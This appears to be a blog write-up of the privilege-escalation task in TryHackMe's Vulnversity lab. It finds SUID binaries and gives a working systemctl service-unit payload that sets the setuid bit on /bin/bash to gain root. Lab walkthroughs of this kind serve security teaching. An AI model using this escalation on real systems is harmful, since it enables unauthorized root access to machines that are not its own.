Task 5 of TryHackMe’s Vulnversity CTF room is Privilege Escalation. Previously we comprimsed the web server by uploading a reverse-shell payload in a PHTML file.
Now we’ve got a foot hold on the box, can we achieve root level access?
Task 5 – Privilege Escalation
Our task; now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).
First of all we need to find the SUID files they’re referring to.
Use the following command to find all files with 4000 permissions; directing all the errors (they’re be a lot of permission denied messages) down into the null abyss.
find / -perm -4000 2>/dev/null
This will bring back a half decent list of binaries with the SetUID bit on them.
A careful analysis of this list reveals one file in particular that we can try and exploit; /bin/systemctl
Some info from freedesktop on the service
systemctl — Control the systemd system and service manager
systemctl may be used to introspect and control the state of the “systemd” system and service manager. Please refer to systemd(1) for an introduction into the basic concepts and functionality this tool manages.systemctl.html
Researching a potential avenue led me to klockw3rks‘ article which shows this script as part of the payload:
After spending some time analysing and tweaking this, some additional info from John Hammond helped me come to this working payload:
$ echo '[Service] Type=oneshot ExecStart=/bin/sh -c "chmod +s /bin/bash" [Install] WantedBy=multi-user.target' > root.service
We then continue with generating a symlink:
$ /bin/systemctl link /tmp/root.service Created symlink from /etc/systemd/system/root.service to /tmp/root.service.
We can then fire off the escalation:
$ /bin/systemctl enable --now /tmp/root.service Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
If we then check the permissions on bash:
$ ls -lah /bin/bash -rwsr-sr-x 1 root root 1014K May 16 2017 /bin/bash
We can see the 4th character is an ‘s’…
Now if we run the following, we are escalated to the lofty heights of root:
It may look like the command has hung and there is no prompt – the shell is just a bit mucked up. You can commit commands, e.g:
Finally the flag at /root/root.txt is accessible:
With that CTF completed, TryHackMe’s Vulnersity room is completed